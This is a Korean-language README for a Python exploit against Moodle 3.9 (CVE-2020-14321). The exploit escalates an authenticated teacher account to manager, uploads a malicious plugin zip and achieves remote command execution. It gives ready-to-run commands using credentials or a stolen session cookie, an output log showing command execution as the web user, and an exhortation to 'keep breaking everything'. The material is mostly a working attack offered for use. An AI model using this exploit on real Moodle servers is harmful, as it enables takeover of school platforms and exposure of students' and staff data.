
Python 스크립트 - CVE-2020-14321 - Moodle 3.9 - 강좌 등록을 통해 교사 역할에서 관리자 역할로 권한 상승이 가능해져 RCE까지 이어지는 취약점을 악용합니다.
CVE-2020-14321을 악용하는 파이썬 스크립트 - Moodle 3.9
과정 등록 시 교사 역할에서 관리자 역할로의 권한 상승이 허용되어 RCE로 이어질 수 있습니다.
페이로드 출처: https://github.com/HoangKien1020/CVE-2020-14321
유효한 교사 자격 증명이 있는 경우 (실제 환경에서는 충분히 테스트되지 않았습니다. 또는 테스트되었을 수도 있고요, 저도 모릅니다 :P):
❭ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle -u lanz -p 'Lanz123$!'
유효한 교사 쿠키가 있는 경우 (101% 테스트 완료):
❱ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle --cookie th3f7k1ngggk00ci30ft3ach3r
...
❱ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle --cookie th3f7k1ngggk00ci30ft3ach3r -c id
__ __ __ __ __ __ __ __
/ \ /|_ __ _) / \ _) / \ __ /| |__| _) _) /|
\__ \/ |__ /__ \__/ /__ \__/ | | __) /__ | • by lanz
Moodle 3.9 - Remote Command Execution (Authenticated as teacher)
Course enrolments allowed privilege escalation from teacher role into manager role to RCE
[+] Login on site: MoodleSession:th3f7k1ngggk00ci30ft3ach3r ✓
[+] Updating roles to move on manager accout: ✓
[+] Updating rol manager to enable install plugins: ✓
[+] Uploading malicious .zip file: ✓
[+] Executing id: ✓
uid=80(www) gid=80(www) groups=80(www)
계속해서 모든 것을 부숴뜨려라!!